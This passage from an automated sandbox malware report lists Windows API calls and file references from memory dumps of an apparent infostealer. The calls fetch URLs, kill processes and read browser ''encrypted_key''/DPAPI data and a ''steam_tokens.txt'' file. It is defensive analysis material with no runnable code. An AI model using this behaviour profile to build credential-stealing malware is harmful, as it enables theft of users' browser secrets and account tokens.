                              • InternetOpenA.WININET(003BCFEC,00000000,00000000,00000000,00000000), ref: 00395677
                              • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00395692
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003956BC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 003956E1
                              • InternetCloseHandle.WININET(?), ref: 003956FA
                              • InternetCloseHandle.WININET(00000000), ref: 00395701
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                              • Instruction ID: 3dfac3ada738dc2fa6e0e1f9b78ebfd7383e7072fa611155aea628f865ae6aad
                              • Opcode Fuzzy Hash: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                              • Instruction Fuzzy Hash: 3C41A270A00605EFDB16CF95DC88FAAB7B5FF48305F1580A9E908DB290D7719985CF94
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                              • CloseHandle.KERNEL32(00000000), ref: 003B47B2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                              • CloseHandle.KERNEL32(00000000), ref: 003B47CB
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                              • Instruction ID: 80dce8281f8c0c6b1710fe96f41c51a0ddaf7cb3a69d45f04ac5b62587822172
                              • Opcode Fuzzy Hash: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                              • Instruction Fuzzy Hash: FF01B571601618AFE7215B609C8EFFA77BCEB58755F0101C4FA05E1182EF74CD88DAA4
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A8435
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A846C
                              • lstrlen.KERNEL32(00000000), ref: 003A84B2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A84E9
                              • lstrlen.KERNEL32(00000000), ref: 003A84FF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A852E
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A853E
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 5b65aca6765f1a470186c183de73f10767198874a0c00f9caf8ab79bb7801d3c
                              • Instruction ID: 9e78daebb2f9c3587bbf06bd2621c5c8506f4c1f7f44aef7c1c3a1bad38344b6
                              • Opcode Fuzzy Hash: 5b65aca6765f1a470186c183de73f10767198874a0c00f9caf8ab79bb7801d3c
                              • Instruction Fuzzy Hash: C151B1719006069FCB22DF29D884A9BB7F9EF5A700F198469EC46DB245EF34D941CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                              • RegOpenKeyExA.ADVAPI32(80000002,00F1BA70,00000000,00020119,003B28A9), ref: 003B294B
                              • RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                              • RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: a9c279b3da065774ac394528fb2188a1dc9ca156dc4806e796fe50342d24d2de
                              • Instruction ID: 84a6590cc89be4e9f103402c61b40af244c7bf8562db562d11e6d0f5f864fa67
                              • Opcode Fuzzy Hash: a9c279b3da065774ac394528fb2188a1dc9ca156dc4806e796fe50342d24d2de
                              • Instruction Fuzzy Hash: A101BC75600218AFE320CBA09C5DEFB7BBCEB48755F100198FE49EB240EA315A0887A0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2895
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B289C
                                • Part of subcall function 003B2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                                • Part of subcall function 003B2910: RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                                • Part of subcall function 003B2910: RegOpenKeyExA.ADVAPI32(80000002,00F1BA70,00000000,00020119,003B28A9), ref: 003B294B
                                • Part of subcall function 003B2910: RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                                • Part of subcall function 003B2910: RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                              • RegOpenKeyExA.ADVAPI32(80000002,00F1BA70,00000000,00020119,003A9500), ref: 003B28D1
                              • RegQueryValueExA.ADVAPI32(003A9500,00F2F3B8,00000000,00000000,00000000,000000FF), ref: 003B28EC
                              • RegCloseKey.ADVAPI32(003A9500), ref: 003B28F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 8d6911bee108b0a623dcbda27312e00e8ae6db20ef7529e12d39190f06c86c59
                              • Instruction ID: dff611154c9ce47080dac8172782bffd917045ddbf6d9438263a4ed8ca9c05df
                              • Opcode Fuzzy Hash: 8d6911bee108b0a623dcbda27312e00e8ae6db20ef7529e12d39190f06c86c59
                              • Instruction Fuzzy Hash: C401A275600618BFD7109BA4AC4DFFB777CEB54315F000158FE08D6250DA705D4897A0
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 0039723E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00397279
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00397280
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 003972C3
                              • HeapFree.KERNEL32(00000000), ref: 003972CA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00397329
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: cc05d0f3aad4700471f2818eefd742428b5ec1dec81a4952e496cf1c5a724a44
                              • Instruction ID: bbf55472805bd5b947057e529d89d24e1d31f069dbd8af67a2f39449a995826b
                              • Opcode Fuzzy Hash: cc05d0f3aad4700471f2818eefd742428b5ec1dec81a4952e496cf1c5a724a44
                              • Instruction Fuzzy Hash: 81415C757157069BDB21CF69DC84BAAB3E8FB88305F1445A9EC4DC7390E631E900DB90
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00399CA8
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00399CDA
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00399D03
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
                              • Opcode ID: b942fb144ee3cea7c8dc6e8172174d82fea6db2c405217b93cbca539b48c8d43
                              • Instruction ID: 8335f4e43b3a2c931bbceeb90e20788e64352ea1144be138cd3b44ac505ea6e5
                              • Opcode Fuzzy Hash: b942fb144ee3cea7c8dc6e8172174d82fea6db2c405217b93cbca539b48c8d43
                              • Instruction Fuzzy Hash: C441A572A01609ABDF23EF69DC85BEF77B4EF54304F0544A9E915AB262DA30ED04C790
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEA24
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEA53
                              • lstrcat.KERNEL32(?,00000000), ref: 003AEA61
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AEA7A
                              • lstrcat.KERNEL32(?,00F288F8), ref: 003AEA8D
                              • lstrcat.KERNEL32(?,003C1794), ref: 003AEA9F
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 360624915c383fe42aef04b9857074acf1d9c75cae1dc9ee398cfd52287f54f1
                              • Instruction ID: 87da215793c507b08a9f704b2dd89bfeffa2278f7cff1920d9c2885a1b47b5ee
                              • Opcode Fuzzy Hash: 360624915c383fe42aef04b9857074acf1d9c75cae1dc9ee398cfd52287f54f1
                              • Instruction Fuzzy Hash: 5E41A772910519AFCB16EB64DC46FFE7378FF58300F0144A8FA169B241DE709E889B94
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AECDF
                              • lstrlen.KERNEL32(00000000), ref: 003AECF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AED1D
                              • lstrlen.KERNEL32(00000000), ref: 003AED24
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003AED52
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: 2c88566226158a631e648d7a4b17ee6c5d7a7613d3689c87de0053b216138222
                              • Instruction ID: 9a3e0f93ff94c284dd7cad4c0d1f18228301f7d94ceacf19d6554d0e2df10183
                              • Opcode Fuzzy Hash: 2c88566226158a631e648d7a4b17ee6c5d7a7613d3689c87de0053b216138222
                              • Instruction Fuzzy Hash: B4316F32A129156FCB23BB78EC4AAAF77A8AF51700F055164F846DF212DF20DC2687D5
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0039140E), ref: 00399A9A
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0039140E), ref: 00399AB0
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,0039140E), ref: 00399AC7
                              • ReadFile.KERNEL32(00000000,00000000,?,0039140E,00000000,?,?,?,0039140E), ref: 00399AE0
                              • LocalFree.KERNEL32(?,?,?,?,0039140E), ref: 00399B00
                              • CloseHandle.KERNEL32(00000000,?,?,?,0039140E), ref: 00399B07
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
